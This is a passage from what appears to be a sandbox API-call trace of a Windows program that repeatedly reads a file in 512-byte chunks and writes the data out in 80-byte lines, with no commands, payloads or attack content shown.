lpOverlapped=0x0) returned 1 [0232.994] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.994] GetFileType (hFile=0x50) returned 0x1 [0232.994] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.994] WriteFile (in: hFile=0x50, 
lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0232.994] _get_osfhandle (_FileHandle=4) returned 0x58 [0232.994] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0232.994] _get_osfhandle (_FileHandle=4) returned 0x58 [0232.994] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0232.994] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.994] GetFileType (hFile=0x50) returned 0x1 [0232.994] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.994] GetFileType (hFile=0x50) returned 0x1 [0232.994] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.994] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.994] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.994] GetFileType (hFile=0x50) returned 0x1 [0232.994] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.994] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.994] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.994] GetFileType (hFile=0x50) returned 0x1 [0232.994] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.994] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.995] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0232.995] GetFileType (hFile=0x50) returned 0x1 [0232.995] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.995] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.995] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.995] GetFileType (hFile=0x50) returned 0x1 [0232.995] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.995] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.995] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.995] GetFileType (hFile=0x50) returned 0x1 [0232.995] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.995] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.995] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.995] GetFileType (hFile=0x50) returned 0x1 [0232.995] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.995] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0232.995] _get_osfhandle (_FileHandle=4) returned 0x58 [0232.995] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0232.995] _get_osfhandle (_FileHandle=4) returned 0x58 [0232.995] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, 
lpOverlapped=0x0) returned 1 [0232.995] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.995] GetFileType (hFile=0x50) returned 0x1 [0232.996] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.996] GetFileType (hFile=0x50) returned 0x1 [0232.996] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.996] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.996] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.996] GetFileType (hFile=0x50) returned 0x1 [0232.996] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.996] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.996] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.996] GetFileType (hFile=0x50) returned 0x1 [0232.996] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.996] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.996] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.996] GetFileType (hFile=0x50) returned 0x1 [0232.996] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.996] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.996] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.996] GetFileType (hFile=0x50) returned 0x1 [0232.996] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.996] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 
| out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.996] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.996] GetFileType (hFile=0x50) returned 0x1 [0232.996] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.996] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.997] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.997] GetFileType (hFile=0x50) returned 0x1 [0232.997] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.997] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0232.997] _get_osfhandle (_FileHandle=4) returned 0x58 [0232.997] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0232.997] _get_osfhandle (_FileHandle=4) returned 0x58 [0232.997] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0232.997] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.997] GetFileType (hFile=0x50) returned 0x1 [0232.997] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.997] GetFileType (hFile=0x50) returned 0x1 [0232.997] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.997] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.997] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.997] GetFileType (hFile=0x50) returned 0x1 [0232.997] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0232.997] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.997] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.997] GetFileType (hFile=0x50) returned 0x1 [0232.997] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.997] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.997] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.998] GetFileType (hFile=0x50) returned 0x1 [0232.998] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.998] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.998] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.998] GetFileType (hFile=0x50) returned 0x1 [0232.998] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.998] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.998] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.998] GetFileType (hFile=0x50) returned 0x1 [0232.998] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.998] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.998] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.998] GetFileType (hFile=0x50) returned 0x1 [0232.998] _get_osfhandle (_FileHandle=1) returned 0x50 
[0232.998] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0232.998] _get_osfhandle (_FileHandle=4) returned 0x58 [0232.998] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0232.998] _get_osfhandle (_FileHandle=4) returned 0x58 [0232.998] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0232.998] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.998] GetFileType (hFile=0x50) returned 0x1 [0232.998] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.998] GetFileType (hFile=0x50) returned 0x1 [0232.998] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.998] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.999] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.999] GetFileType (hFile=0x50) returned 0x1 [0232.999] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.999] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.999] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.999] GetFileType (hFile=0x50) returned 0x1 [0232.999] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.999] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 
[0232.999] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.999] GetFileType (hFile=0x50) returned 0x1 [0232.999] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.999] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.999] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.999] GetFileType (hFile=0x50) returned 0x1 [0232.999] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.999] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.999] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.999] GetFileType (hFile=0x50) returned 0x1 [0232.999] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.999] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.000] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.000] GetFileType (hFile=0x50) returned 0x1 [0233.000] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.000] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0233.000] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.000] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0233.000] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.000] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, 
lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.000] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.000] GetFileType (hFile=0x50) returned 0x1 [0233.000] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.000] GetFileType (hFile=0x50) returned 0x1 [0233.000] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.000] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.000] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.000] GetFileType (hFile=0x50) returned 0x1 [0233.000] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.000] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.000] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.000] GetFileType (hFile=0x50) returned 0x1 [0233.000] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.000] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.001] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.001] GetFileType (hFile=0x50) returned 0x1 [0233.001] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.001] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.001] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.001] GetFileType (hFile=0x50) returned 0x1 [0233.001] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.001] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.001] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.001] GetFileType (hFile=0x50) returned 0x1 [0233.001] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.001] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.001] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.001] GetFileType (hFile=0x50) returned 0x1 [0233.001] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.001] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0233.001] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.001] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0233.001] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.001] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.001] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.001] GetFileType (hFile=0x50) returned 0x1 [0233.001] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.001] GetFileType (hFile=0x50) returned 0x1 [0233.002] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.002] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.002] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.002] GetFileType 
(hFile=0x50) returned 0x1 [0233.002] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.002] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.002] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.002] GetFileType (hFile=0x50) returned 0x1 [0233.002] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.002] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.002] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.002] GetFileType (hFile=0x50) returned 0x1 [0233.002] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.002] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.002] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.002] GetFileType (hFile=0x50) returned 0x1 [0233.002] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.002] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.002] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.002] GetFileType (hFile=0x50) returned 0x1 [0233.002] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.002] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.002] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.003] GetFileType (hFile=0x50) returned 0x1 [0233.003] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0233.003] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0233.003] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.003] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0233.003] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.003] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.003] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.003] GetFileType (hFile=0x50) returned 0x1 [0233.003] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.003] GetFileType (hFile=0x50) returned 0x1 [0233.003] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.003] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.003] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.003] GetFileType (hFile=0x50) returned 0x1 [0233.003] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.003] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.003] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.003] GetFileType (hFile=0x50) returned 0x1 [0233.003] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.003] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, 
lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.003] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.003] GetFileType (hFile=0x50) returned 0x1 [0233.003] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.003] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.004] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.004] GetFileType (hFile=0x50) returned 0x1 [0233.004] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.004] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.004] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.004] GetFileType (hFile=0x50) returned 0x1 [0233.004] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.004] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.004] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.004] GetFileType (hFile=0x50) returned 0x1 [0233.004] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.004] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0233.004] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.004] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0233.004] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.004] ReadFile (in: hFile=0x58, 